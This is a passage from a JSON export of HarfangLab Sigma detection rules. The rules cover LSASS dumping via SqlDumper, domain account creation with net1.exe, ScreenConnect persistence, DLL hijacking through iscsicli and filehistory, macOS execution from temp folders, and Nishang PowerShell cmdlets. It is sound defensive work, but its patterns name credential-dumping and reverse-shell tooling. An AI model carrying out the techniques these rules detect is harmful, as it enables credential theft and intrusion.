"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1555"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eaba0d6e-91a2-4932-8dd6-3f4126ec4d7b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072586Z",
"creation_date": "2026-03-23T11:45:34.072588Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072593Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1136/002/"
],
"name": "t1136_net_create_domain_account.yml",
"content": "title: Domain User Account Created via net.exe\nid: eaba0d6e-91a2-4932-8dd6-3f4126ec4d7b\ndescription: |\n Detects the creation of a domain user account via net1.exe.\n Adversaries may create a domain account to maintain access to victim systems.\n It is recommended to check the legitimacy of this action and that it is carried out by an authorized administrator.\nreferences:\n - https://attack.mitre.org/techniques/T1136/002/\ndate: 2023/03/08\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.002\n - attack.initial_access\n - attack.t1078.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.AccountManipulation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_args:\n CommandLine|contains|all:\n - ' user'\n - '/add'\n - '/domain'\n\n exclusion_dir:\n - CurrentDirectory|endswith: '\\copssh\\home\\syncldap\\'\n - Username|endswith: '\\syncldap'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eaba0d6e-91a2-4932-8dd6-3f4126ec4d7b",
"rule_name": "Domain User Account Created via net.exe",
"rule_description": "Detects the creation of a domain user account via net1.exe.\nAdversaries may create a domain account to maintain access to victim systems.\nIt is recommended to check the legitimacy of this action and that it is carried out by an authorized administrator.\n",
"rule_creation_date": "2023-03-08",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1078.002",
"attack.t1136.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eadf1fb9-7a50-4c8c-ae23-1a7034cdb55c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087193Z",
"creation_date": "2026-03-23T11:45:34.087195Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087199Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_memory_dump_sqldumper.yml",
"content": "title: LSASS Process Memory Dumped via SqlDumper.exe\nid: eadf1fb9-7a50-4c8c-ae23-1a7034cdb55c\ndescription: |\n Detects an attempt to dump the LSASS' process memory using SqlDumper.exe.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to analyze the parent process for suspicious activities, investigate any further malicious actions on the host and to start memory forensics to determine stolen credentials.\nreferences:\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2022/07/21\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.LOLBin.SqlDumper\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: 'PROCESS_VM_READ'\n ProcessOriginalFileName: 'SqlDumper.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eadf1fb9-7a50-4c8c-ae23-1a7034cdb55c",
"rule_name": "LSASS Process Memory Dumped via SqlDumper.exe",
"rule_description": "Detects an attempt to dump the LSASS' process memory using SqlDumper.exe.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to analyze the parent process for suspicious activities, investigate any further malicious actions on the host and to start memory forensics to determine stolen credentials.\n",
"rule_creation_date": "2022-07-21",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eae16484-81b2-44df-893e-fa3bbad6136d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071985Z",
"creation_date": "2026-03-23T11:45:34.071987Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071991Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/",
"https://attack.mitre.org/techniques/T1543/003/",
"https://attack.mitre.org/software/S0591/"
],
"name": "t1543_003_suspicious_screenconnect_service.yml",
"content": "title: ScreenConnect Persistent Service Created\nid: eae16484-81b2-44df-893e-fa3bbad6136d\ndescription: |\n Detects the creation of a service registry key associated with a ScreenConnect guest beacon.\n Attackers often use ScreenConnect as a remote access tool both for its simplicity and stealth as a legitimate application.\n ScreenConnect can be installed in unattended mode in which it creates a service for persistence across reboots.\n It is recommended to analyze actions performed by the ScreenConnect binary as well as to check whether its presence is legitimate.\nreferences:\n - https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\n - https://attack.mitre.org/techniques/T1543/003/\n - https://attack.mitre.org/software/S0591/\ndate: 2024/07/15\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543.003\n - attack.command_and_control\n - attack.t1219.002\n - attack.s0591\n - classification.Windows.Source.Registry\n - classification.Windows.RMM.ScreenConnect\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: registry_event\n product: windows\ndetection:\n selection:\n TargetObject|endswith: '\\\\*ControlSet*\\Services\\\\*\\ImagePath'\n Details|contains|all:\n - 'ScreenConnect.ClientService.exe'\n - 'e=Access'\n - 'y=Guest'\n - 'h='\n\n exclusion_windowssetup:\n ProcessImage:\n - '?:\\$WINDOWS.~BT\\Sources\\setupplatform.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eae16484-81b2-44df-893e-fa3bbad6136d",
"rule_name": "ScreenConnect Persistent Service Created",
"rule_description": "Detects the creation of a service registry key associated with a ScreenConnect guest beacon.\nAttackers often use ScreenConnect as a remote access tool both for its simplicity and stealth as a legitimate application.\nScreenConnect can be installed in unattended mode in which it creates a service for persistence across reboots.\nIt is recommended to analyze actions performed by the ScreenConnect binary as well as to check whether its presence is legitimate.\n",
"rule_creation_date": "2024-07-15",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1219.002",
"attack.t1543.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eafcd13f-3580-42be-8cb8-c6181e0313be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618033Z",
"creation_date": "2026-03-23T11:45:34.618035Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618040Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/operation-applejeus/87553/",
"https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_suspicious_folder_execution_macos.yml",
"content": "title: Process Executed From a Suspicious Folder (macOS)\nid: eafcd13f-3580-42be-8cb8-c6181e0313be\ndescription: |\n Detects execution of a process from a suspicious folder.\n Adversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\n It is recommended to check the executed process and its parents/children for malicious behavior.\nreferences:\n - https://securelist.com/operation-applejeus/87553/\n - https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2024/05/15\nmodified: 2025/10/13\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection_bin:\n ProcessImage|re:\n - '^(?i)/private/var/[^/]*$'\n - '^(?i)/private/tmp/[^/]*$'\n - '^(?i)/private/etc/.*'\n - '^(?i)/private/var/root/.*'\n\n # selection_shell:\n # ProcessImage:\n # - '/bin/bash'\n # - '/bin/sh'\n # - '/bin/zsh'\n\n # selection_shell_cwd:\n # CommandLine|re:\n # - (?i)/private/tmp/[^/'\" ]*$\n # - '(?i)/private/tmp/[^/]+ *$'\n # - '(?i)/private/tmp/[^/]+\"$'\n # - \"(?i)/private/tmp/[^/]+'$\"\n\n exclusion_air_engine:\n # https://github.com/air-verse/air/\n ProcessImage: '/private/tmp/engine'\n ProcessParentImage|endswith: '/go/bin/air'\n\n exclusion_p5sys_jump:\n ProcessImage|startswith: '/private/var/root/library/caches/com.p5sys.jump.connect/org.sparkle-project.sparkle/jump desktop connect (autoupdate).app/contents/macos/'\n\n exclusion_manageengine:\n ProcessGrandparentImage: '/Library/ManageEngine/UEMS_Agent/bin/dcagentservice'\n\n exclusion_meraki:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.meraki.m_agent'\n\n exclusion_adobe:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.adobe.AdobeResourceSynchronizer'\n\n exclusion_forti:\n - Image:\n - '/private/etc/FortiClient/upgrade/fcdeployd'\n - '/private/etc/fct_upgrade/SendFailureReport'\n - ParentImage: '/private/etc/FortiClient/upgrade/fcdeployd'\n\n exclusion_cursor:\n GrandparentCommandLine|startswith: '/Applications/Cursor.app/Contents/Frameworks/Cursor Helper (Plugin).app/Contents/MacOS/Cursor Helper (Plugin) --type=utility '\n\n exclusion_studio_code:\n GrandparentCommandLine|startswith: '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper --type=utility '\n\n condition: selection_bin and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eafcd13f-3580-42be-8cb8-c6181e0313be",
"rule_name": "Process Executed From a Suspicious Folder (macOS)",
"rule_description": "Detects execution of a process from a suspicious folder.\nAdversaries may try to execute binaries from uncommon directories in order to bypass security features or hide malicious binaries.\nIt is recommended to check the executed process and its parents/children for malicious behavior.\n",
"rule_creation_date": "2024-05-15",
"rule_modified_date": "2025-10-13",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eb11687b-d8b4-4ee5-bff4-32c03dd6e493",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606822Z",
"creation_date": "2026-03-23T11:45:34.606825Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606833Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/samratashok/nishang",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_nishang_script.yml",
"content": "title: Malicious PowerShell Nishang Commandlets\nid: eb11687b-d8b4-4ee5-bff4-32c03dd6e493\ndescription: |\n Detects various malicious commandlets in PowerShell's command-line, generally associated with the Nishang framework.\n Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.\n It is recommended to investigate actions performed by attackers using the Nishang framework and to isolate infected systems.\nreferences:\n - https://github.com/samratashok/nishang\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/06/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1095\n - attack.collection\n - attack.t1115\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Framework.Nishang\n - classification.Windows.Script.PowerShell\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Add-ScrnSaveBackdoor '\n - 'Gupt-Backdoor '\n - 'Invoke-ADSBackdoor '\n - 'Enabled-DuplicateToken '\n - 'Invoke-PsUaCme '\n - 'Remove-Update '\n - 'Get-LSASecret '\n - 'Get-PassHashes '\n - 'Show-TargetScreen '\n - 'Port-Scan '\n - 'Invoke-PoshRatHttp '\n - 'Invoke-PoshRatHttps '\n - 'Invoke-PowerShellTCP '\n - 'Invoke-PowerShellWMI '\n - 'Add-Exfiltration '\n - 'Add-Persistence '\n - 'Do-Exfiltration '\n - 'Start-CaptureServer '\n - 'Get-ChromeDump '\n - 'Get-ClipboardContents '\n - 'Invoke-Mimikittenz '\n - 'Invoke-PowerShellIcmp '\n\n exclusion_sentinelone:\n PowershellCommand|contains|all:\n - ':::::\\windows\\sentinel\\'\n - '<#sentinelbreakpoints#>'\n - 'Add-Persistence'\n\n exclusion_aadinternals:\n # C:\\Program Files\\WindowsPowerShell\\Modules\\AADInternals\\0.6.8\\AADSyncSettings.ps1\n # C:\\Program Files\\WindowsPowerShell\\Modules\\AADInternals\\0.6.8\\AADInternals.psd1\n PowershellScriptPath|startswith: '?:\\Program Files\\WindowsPowerShell\\Modules\\AADInternals\\'\n PowershellCommand|contains|all:\n - '$LSASecret=Get-LSASecrets -Users'\n - '_SC_ADSync'\n - '$password=$LSASecret.PasswordTxt'\n\n exclusion_tanium:\n ProcessImage: '?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumClient.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eb11687b-d8b4-4ee5-bff4-32c03dd6e493",
"rule_name": "Malicious PowerShell Nishang Commandlets",
"rule_description": "Detects various malicious commandlets in PowerShell's command-line, generally associated with the Nishang framework.\nNishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.\nIt is recommended to investigate actions performed by attackers using the Nishang framework and to isolate infected systems.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1095",
"attack.t1115"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebb3b1b1-bbf2-4e68-ae36-1c51d1aacb09",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098420Z",
"creation_date": "2026-03-23T11:45:34.098422Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098427Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iscsicli.yml",
"content": "title: DLL Hijacking via iscsicli.exe\nid: ebb3b1b1-bbf2-4e68-ae36-1c51d1aacb09\ndescription: |\n Detects potential Windows DLL Hijacking via iscsicli.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'iscsicli.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\ISCSIDSC.dll'\n - '\\ISCSIUM.dll'\n - '\\WMICLNT.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebb3b1b1-bbf2-4e68-ae36-1c51d1aacb09",
"rule_name": "DLL Hijacking via iscsicli.exe",
"rule_description": "Detects potential Windows DLL Hijacking via iscsicli.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebb95111-6046-42fa-a44e-b9fedef79771",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600890Z",
"creation_date": "2026-03-23T11:45:34.600893Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600901Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_filehistory.yml",
"content": "title: DLL Hijacking via filehistory.exe\nid: ebb95111-6046-42fa-a44e-b9fedef79771\ndescription: |\n Detects potential Windows DLL Hijacking via filehistory.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'filehistory.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\dsrole.dll'\n - '\\efsutil.dll'\n - '\\explorerframe.dll'\n - '\\fhcfg.dll'\n - '\\mpr.dll'\n - '\\msctf.dll'\n - '\\ncrypt.dll'\n - '\\rsaenh.dll'\n - '\\UxTheme.dll'\n - '\\wevtapi.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ebb95111-6046-42fa-a44e-b9fedef79771",
"rule_name": "DLL Hijacking via filehistory.exe",
"rule_description": "Detects potential Windows DLL Hijacking via filehistory.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ebcc3c72-c1f1-476c-b665-6fd18b618287",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627905Z",
"creation_date": "2026-03-23T11:45:34.627907Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627911Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.malwarebytes.com/cryptojacking",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_cryptominer_pool_dns_request_linux.yml",
